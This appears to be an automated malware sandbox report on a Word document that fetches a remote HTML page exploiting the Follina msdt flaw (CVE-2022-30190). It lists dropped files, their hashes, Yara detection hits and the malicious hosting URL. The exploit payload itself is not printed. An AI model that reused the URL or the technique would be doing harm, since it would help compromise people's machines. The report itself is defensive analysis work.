            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed:6
            Number of new started drivers analysed:1
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal96.expl.evad.winDOCX@1/20@7/2
            EGA Information:Failed
            HDC Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Scroll down
            • Close Viewer
            • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
            • TCP Packets have been reduced to 100
            • Report size getting too big, too many NtCreateFile calls found.
            • Report size getting too big, too many NtQueryAttributesFile calls found.
            No simulations
            No context
            No context
            No context
            No context
            No context
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.28773612475316834
            Encrypted:false
            SSDEEP:24:I3yC/9LC4tB37+KqorUSjnClWnyc8v5TbT/tAZvzKxFcNTRxlQvnS8S9XqJNQSEQ:I35RBzAccmKyTjlJQaxwOr0JZH
            MD5:FF3458BF59CAB2B33042A43FE7571C5E
            SHA1:B8B002E94BF658303BE1DA5E7D5FA7670EA882B7
            SHA-256:E151CF032E1294178D66CF5D065FD8F0C26D27945195FD34738910D25B6A567D
            SHA-512:256C055110B1AA138F19FC4519D05FE158FBCEF88C8E604DECE24FF2AAB6808208E9DED419613436E08DB2429124F131F2E5F81FCDFC3C9C0E1CE1240F0EC212
            Malicious:false
            Reputation:low
            Preview:......M.eFy...zk9ln...H...J../.S,...X.F...Fa.q..............................!.);.N...?...L.........+9....D..r..0..A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.6745976468464878
            Encrypted:false
            SSDEEP:768:T5K146vqOVHUvJBmtlK2DrxtlK2DrwZPJl/XDr/klmDr/4xtD+DrbtDlDr:Lhw
            MD5:9F01FC48E22641773BC5DB74B89EB0E1
            SHA1:B4985AF395531C350958A267B7D81F78AABA57A2
            SHA-256:0E19C09DC2C68235B7C39C13A81A3125C376D9135267CB003B1057285581374B
            SHA-512:BCA4CA34F6F4DCF49EF55B53FF8C9F1452BCE4A6426B083FC7AFA578CD88C07635E12844AA63319E5CC21128EB2F7FCD1066FD7DAE453A1720333FA41445A9E2
            Malicious:false
            Reputation:low
            Preview:......M.eFy...zM..7..+M....L..NS,...X.F...Fa.q..............................J....@.B.H.............).%5VJ... .....S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):114
            Entropy (8bit):3.936756154878342
            Encrypted:false
            SSDEEP:3:yVlgsRlzXh4NaPlDpKQclkrI8TcOhFYDZ276:yPblzXeWl0J+c8QGFYDZ22
            MD5:508E494841A8C3839E148679A4937283
            SHA1:668677B7DBA2DBD40A596A200D0176B965BD44AE
            SHA-256:AB0AE8DEF878D06C5F65D16C14B4ACBEE7EED1666584865D90C62E5704B5B48A
            SHA-512:DABFFDCCE773E059F52E137EAE54621AE36E33CB28A5A6A86CC5E323D23A8ACDB3B8B76CB74CC9BFDFC8586A0D2BF553FE63C40F5B1D3CCB197A6721E1ED644A
            Malicious:false
            Reputation:low
            Preview:..H..@....b..q....]F.S.D.-.{.8.2.D.6.D.0.4.A.-.E.2.A.7.-.4.2.F.1.-.8.9.A.6.-.C.F.D.5.7.F.9.E.C.7.6.6.}...F.S.D..
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.28745721354451365
            Encrypted:false
            SSDEEP:48:I3sPRBffmW1AEr12ORQopWi3hI9ahlrq1/Tp9oipEGQO09oipEGQOyH:KoLXYErFHI9aXq1DmbBmbvH
            MD5:5F39A4DAC8039EB065DD8D063640BC4F
            SHA1:BBEA611DA4F133FB3F02C273B60D379060ECC49C
            SHA-256:FA8BE565755B84D32FF994D075AF5002629176DA9771B5CC9C78268C0021BACC
            SHA-512:5B983F376F0146604DA61EBED288E016E4DD43EA1A8971D3953DBC8D1B52B5BD22D88B32628A61EC06C784B14AC2B0A5F65AC8B128F3D84422861B0BE9BFBC2D
            Malicious:false
            Reputation:low
            Preview:......M.eFy...z....H*.O...L..S,...X.F...Fa.q.............................&.....F.~.c...............7..B.Z.../^T.A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.22075992709284928
            Encrypted:false
            SSDEEP:48:I3oyQUrB/2aWIeFRmHaaGEW1+7DYd7z1IZuxTV/ZjA/iZjA/J:KoLCjuRQG7ZYuxT/AmAx
            MD5:B53D2E2D585B0857AAFF3A807DDDFE73
            SHA1:309EB90AD24B5FC926D00B6B16A2DE199522114E
            SHA-256:EE3835D8BE77FC46EB661A14ADCC3285582CC8774C8F2617922D99D5A13C29CE
            SHA-512:C8ACE3F93133C5F4C8E257D311DE4F182144F4871EDA19A18DD83BB0E05A433FA37F4440F8DA50C283FD720D6F4860B601B56F91D3C95BF56186674C8DBAE769
            Malicious:false
            Reputation:low
            Preview:......M.eFy...zI...ZSbO.*G..8.S,...X.F...Fa.q..............................p..FG...+@.H.........d....$/H....N..-P>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):114
            Entropy (8bit):3.92634307586349
            Encrypted:false
            SSDEEP:3:yVlgsRlz2rZjMWjjic+lIHdhHAWelOVG4R7276:yPblzwWDc19SWzk4t22
            MD5:63BA949A4695972C1A0E4D0BEC674841
            SHA1:6002A36601A9EEE1C8B4667761AF8815D4E6D8C9
            SHA-256:D5D97F1310E4BFA007D830CA4E1953DF22BE1B797B27692712F5C93E6DBC43DB
            SHA-512:2EE603F54070AA54538FCB3F8C541437E1BFA50E3F56380801356069354940FBFCCB116591D59B25D5F435255E0820DBFCB271EF975670FC91BD03D1D7D1A39D
            Malicious:false
            Reputation:low
            Preview:..H..@....b..q....]F.S.D.-.{.E.C.A.F.6.F.F.3.-.F.9.C.F.-.4.9.5.B.-.8.0.D.B.-.8.0.3.5.D.E.A.3.0.9.E.7.}...F.S.D..
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:HTML document, ASCII text, with very long lines
            Category:downloaded
            Size (bytes):5901
            Entropy (8bit):4.701941274629396
            Encrypted:false
            SSDEEP:96:O/iGBF2nPW5mDwID8qImX1I8vHWYMLJJ2lpyffnbTc7Om/EAEwCgEAKKiSe+0glg:OZ5mDwIDukGTlKEHbTcKCZEwCgEzKiSs
            MD5:2C855A56E062B197D4CC9D021DF71219
            SHA1:C3161D4AF43AD3DA1B08FF367C06D12FA7D483D5
            SHA-256:A6F55957542982348EB412B9B49797E1931183A6BF395016885E1294C5A08DBD
            SHA-512:11B94B5B6E3F4AEC38B15BF73A3B6836955980F5A47293266BB1FAA88005C94EBBF57465D02D8D4CF164E3F28236A7190592CA6E8C3E82A98CBF7708CF1DCDC0
            Malicious:true
            Yara Hits:
            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm, Author: Nasreddine Bencherchali, Christian Burkard
            • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm, Author: Tobias Michalski, Christian Burkard
            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm, Author: Nasreddine Bencherchali, Christian Burkard
            • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm, Author: Tobias Michalski, Christian Burkard
            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm, Author: Joe Security
            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm, Author: Joe Security
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            Reputation:low
            IE Cache URL:https://dullghostwhitetwintext.karewen.repl.co/index.html
            Preview:<!doctype html>.<html lang="en">.<head>.<title>.Good thing we disabled macros.</title>.</head>.<body>.<p>.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor...Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit...Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignis
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:HTML document, ASCII text, with very long lines
            Category:dropped
            Size (bytes):5901
            Entropy (8bit):4.701941274629396
            Encrypted:false
            SSDEEP:96:O/iGBF2nPW5mDwID8qImX1I8vHWYMLJJ2lpyffnbTc7Om/EAEwCgEAKKiSe+0glg:OZ5mDwIDukGTlKEHbTcKCZEwCgEzKiSs
            MD5:2C855A56E062B197D4CC9D021DF71219
            SHA1:C3161D4AF43AD3DA1B08FF367C06D12FA7D483D5
            SHA-256:A6F55957542982348EB412B9B49797E1931183A6BF395016885E1294C5A08DBD
            SHA-512:11B94B5B6E3F4AEC38B15BF73A3B6836955980F5A47293266BB1FAA88005C94EBBF57465D02D8D4CF164E3F28236A7190592CA6E8C3E82A98CBF7708CF1DCDC0
            Malicious:false
            Reputation:low
            Preview:<!doctype html>.<html lang="en">.<head>.<title>.Good thing we disabled macros.</title>.</head>.<body>.<p>.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor...Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit...Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignis
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:HTML document, ASCII text, with very long lines
            Category:dropped
            Size (bytes):5901
            Entropy (8bit):4.701941274629396
            Encrypted:false
            SSDEEP:96:O/iGBF2nPW5mDwID8qImX1I8vHWYMLJJ2lpyffnbTc7Om/EAEwCgEAKKiSe+0glg:OZ5mDwIDukGTlKEHbTcKCZEwCgEzKiSs
            MD5:2C855A56E062B197D4CC9D021DF71219
            SHA1:C3161D4AF43AD3DA1B08FF367C06D12FA7D483D5
            SHA-256:A6F55957542982348EB412B9B49797E1931183A6BF395016885E1294C5A08DBD
            SHA-512:11B94B5B6E3F4AEC38B15BF73A3B6836955980F5A47293266BB1FAA88005C94EBBF57465D02D8D4CF164E3F28236A7190592CA6E8C3E82A98CBF7708CF1DCDC0
            Malicious:true
            Yara Hits:
            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\535F33EE.htm, Author: Nasreddine Bencherchali, Christian Burkard
            • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\535F33EE.htm, Author: Tobias Michalski, Christian Burkard
            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\535F33EE.htm, Author: Joe Security
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Reputation:low
            Preview:<!doctype html>.<html lang="en">.<head>.<title>.Good thing we disabled macros.</title>.</head>.<body>.<p>.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor...Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit...Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignis
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):10172
            Entropy (8bit):3.928478624213631
            Encrypted:false
            SSDEEP:48:q373cifeyUaIWmBJOhTDOj1WN7M60iIiB7rSwVauLM/Myof9NLRgMy7k3e2kW86J:873xeXaIBckry+Ks8D+plS
            MD5:C349F98D0BBE0D72F9A6E34335918207
            SHA1:B2184C336F95E1ED5F338D1B27D06A4F8E1C535F
            SHA-256:8ACC7CBE7BEB283D3908F418FB5390623F1EB46018F426D4911F5515E786CAA5
            SHA-512:A6DE09C1E4B3947EF4B8BF46B14A3E77AFFB6004EDED3560814720B8304542F1722EFEF83502E0532C76B438015B84200302BE5CE5F8C1228A881F050BE8AE5B
            Malicious:false
            Reputation:low
            Preview:....l...............I...........'...9... EMF.....'..........................8...5.......................................................R...R...p...................................S.e.g.o.e. .U.I.................................................................................................................................................................................................................................................................................................................dv......%...................................r....$..`.........../...`.......0...0..................?...........?................l...4........$..0...0...(...0...0..... ......$......................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:HTML document, ASCII text, with very long lines
            Category:dropped
            Size (bytes):5901
            Entropy (8bit):4.701941274629396
            Encrypted:false
            SSDEEP:96:O/iGBF2nPW5mDwID8qImX1I8vHWYMLJJ2lpyffnbTc7Om/EAEwCgEAKKiSe+0glg:OZ5mDwIDukGTlKEHbTcKCZEwCgEzKiSs
            MD5:2C855A56E062B197D4CC9D021DF71219
            SHA1:C3161D4AF43AD3DA1B08FF367C06D12FA7D483D5
            SHA-256:A6F55957542982348EB412B9B49797E1931183A6BF395016885E1294C5A08DBD
            SHA-512:11B94B5B6E3F4AEC38B15BF73A3B6836955980F5A47293266BB1FAA88005C94EBBF57465D02D8D4CF164E3F28236A7190592CA6E8C3E82A98CBF7708CF1DCDC0
            Malicious:true
            Yara Hits:
            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEAC362C.htm, Author: Nasreddine Bencherchali, Christian Burkard
            • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEAC362C.htm, Author: Tobias Michalski, Christian Burkard
            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEAC362C.htm, Author: Joe Security
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Reputation:low
            Preview:<!doctype html>.<html lang="en">.<head>.<title>.Good thing we disabled macros.</title>.</head>.<body>.<p>.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor...Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit...Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignis
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Composite Document File V2 Document, Cannot read section info
            Category:dropped
            Size (bytes):5632
            Entropy (8bit):2.181448160411441
            Encrypted:false
            SSDEEP:48:rMTLxD3U2557fpQ0fpQRiVDaU2557fpQAfpQFi:QTLxD3U2TenAVDaU2Ter0
            MD5:4B4FEA476768A33C0BCF51BCDDB2CCD4
            SHA1:80D924A68CBE3D1CAA003D7180A3FB3713A15F30
            SHA-256:675CDC18EB9F7FA3C1C4287FF4C1CFADFB81B54073AF377D5082BD23B0D472CD
            SHA-512:20B06E268A0343D559C140BF525E4C0915EB9B5BDA33D94BC51E5B19EBEE3C725CD2E0D1BF75D34E9E4C984F32E0CA0356D85378CECD8DE1EA44ED38EEB68A24
            Malicious:false
            Reputation:low
            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):1024
            Entropy (8bit):0.05390218305374581
            Encrypted:false
            SSDEEP:3:ol3lYdn:4Wn
            MD5:5D4D94EE7E06BBB0AF9584119797B23A
            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
            Malicious:false
            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):1536
            Entropy (8bit):0.9434685449697431
            Encrypted:false
            SSDEEP:6:FlIcElClbY/z35lEHaAlPrP5llAabK/O3iuzxyn4PxZUtg:Fl7MClcFlEHaAPrzXKzut8GZz
            MD5:4D066506FC8303FE21BD33D70AD15382
            SHA1:FBEB98890B56989FBDD274982690F11DA6EF3B8E
            SHA-256:D210EDD7CC5EEC6A9C3AD9C09B2755B8144C3A5ED44B178FE1EE3A50852E7B38
            SHA-512:05B05479DE9EE50CA74A890D27634A065995D34601343F059B8B66516FAAC79098CB4F9ADABFB3ED5CA763BF67A953260FFAA36D24A3BABC04FBA22BC9541FC5
            Malicious:false
            Preview:....L.I.N.K. .P.a.c.k.a.g.e. .".h.t.t.p.s.:././.d.u.l.l.g.h.o.s.t.w.h.i.t.e.t.w.i.n.t.e.x.t...k.a.r.e.w.e.n...r.e.p.l...c.o./.i.n.d.e.x...h.t.m.l.!.". .".". .\.b..... . ...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.02572382778486038
            Encrypted:false
            SSDEEP:6:I3DPcrHavxggLRxv26Lt3RXv//4tfnRujlw//+GtluJ/eRuj:I3DP2Hc/tRvYg3J/
            MD5:FAA9C11C3BF4749CF7FFF72F81103637
            SHA1:EA800893E160BDEC41C9E5A208ECDEFD93020DE4
            SHA-256:E4FE523DD900A6A9384D518919DC6F46F67E47BA19062D66BC33738FC9D63D7C
            SHA-512:89283E5CC4D45C886D88EDFF6DD6D81FFBD9DC643925411851E4EAE034BD56F8C9C60C932D6C8DE3A95DB20D06F0F0A4DBF4081CBFBAA03B174D061BA4A79A66
            Malicious:false
            Preview:......M.eFy...zk9ln...H...J../.S,...X.F...Fa.q............................f],....H.^...6...........+9....D..r..0......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.025486724730822925
            Encrypted:false
            SSDEEP:6:I3DPc3vxggLReaZopSdh/RXv//4tfnRujlw//+GtluJ/eRuj:I3DPM6H2PvYg3J/
            MD5:DF1D9A5116232C0278742EE1F191FF0C
            SHA1:0BA0ABF8406B667D8C632F6B3ED6395430A0E8D1
            SHA-256:E4BC1D0AA363F21236E3EDF16C6863CB44D1A3E24B12EC190B33C8F19DF493A9
            SHA-512:35AE70F978C47590A32D185E04AA07C45647D8A9B42E0A1716E6AA1EE075A3F0CFF252FF1853A4C9E474C672F81DAB4022BA3AA37C5FDD1075413668015CB15B
            Malicious:false
            Preview:......M.eFy...z....H*.O...L..S,...X.F...Fa.q............................./g.T.C.B.t.;.............7..B.Z.../^T.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Aug 18 10:22:03 2022, mtime=Thu Aug 18 10:22:03 2022, atime=Thu Aug 18 10:22:14 2022, length=26614, window=hide
            Category:dropped
            Size (bytes):1019
            Entropy (8bit):4.541555035737997
            Encrypted:false
            SSDEEP:12:8mbA80gXg/XAlCPCHaXNBQtB/XAJX+WuvWQK3juicvbTS3tb4GK/NDtZ3YilMMEh:8mb1k/XT9Sk+mNeHS3ADv3q+u7D
            MD5:16C92C158C9E519DF7E7171A87BA915B
            SHA1:5EA87A76FB2D1CB7776EE3E10902DB4D444EC686
            SHA-256:C3556B03AEDC5348C415F365D63B28E0DF81C86D721A2C8D1937AFDC46879F35
            SHA-512:BEFC41BCB397B893BFD14392992FC02FAD04AD946493E359E20DF11D3136DD145076148BA88B2BE3471D3709EA6EDC9B56EA90A02DC5F246BEE1E26F87CE183F
            Malicious:false
            Preview:L..................F.... ...^{(.....^{(.............g...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1......U.Z..Desktop.d......QK.X.U.Z*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2..g...U.Z .C1ZGT6~1.DOC..L.......U.Z.U.Z*.........................C.1.Z.G.t.6.1.u.G.v...d.o.c.x.......y...............-...8...[............?J......C:\Users\..#...................\\377142\Users.user\Desktop\C1ZGt61uGv.docx.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.1.Z.G.t.6.1.u.G.v...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......377142..........D_....3N...W...9G..N..... .....[D_....3N...W...9G
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):72
            Entropy (8bit):4.780851828270855
            Encrypted:false
            SSDEEP:3:bDuMJl+Uqe3TAlmxWtmx3TAlv:bCne3CE3W
            MD5:69F6516C10F77E405479AA56E74F44A0
            SHA1:36194337D22DE7E093B6659C3E3A1C98A2F243CE
            SHA-256:EFAE2CC5C7CBDFF13D4AC0A4FB3F0C0000C52A4E1C9AD499C834F0135A8ECCFB
            SHA-512:3443F8CF1E2804F86512DDDCEC8DF5F0F3683FA2D1E57FC4592E8A13FC7CCC9E402230D71F956DDB8D3873B6825979EB706599CB0F7B2FF32D1A993F31D9451B
            Malicious:false
            Preview:[folders]..Templates.LNK=0..C1ZGt61uGv.LNK=0..[misc]..C1ZGt61uGv.LNK=0..
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):162
            Entropy (8bit):2.503835550707525
            Encrypted:false
            SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
            MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
            SHA1:23684CCAA587C442181A92E722E15A685B2407B1
            SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
            SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
            Malicious:false
            Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):162
            Entropy (8bit):2.503835550707525
            Encrypted:false
            SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
            MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
            SHA1:23684CCAA587C442181A92E722E15A685B2407B1
            SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
            SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
            Malicious:false
            Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
            File type:Microsoft Word 2007+
            Entropy (8bit):7.316883678675453
            TrID:
            • Word Microsoft Office Open XML Format document (49504/1) 49.01%
            • Word Microsoft Office Open XML Format document (43504/1) 43.07%
            • ZIP compressed archive (8000/1) 7.92%
            File name:C1ZGt61uGv.docx
            File size:26614
            MD5:98998af843c2c938c079a102abe6c73d
            SHA1:b1a1dda90b3df0ba5f23430a6c55c48a9c3dbe9d
            SHA256:b0cfd511498cbaed084fa622cfeb1a07de7478205cbff58cb40cb89091813593
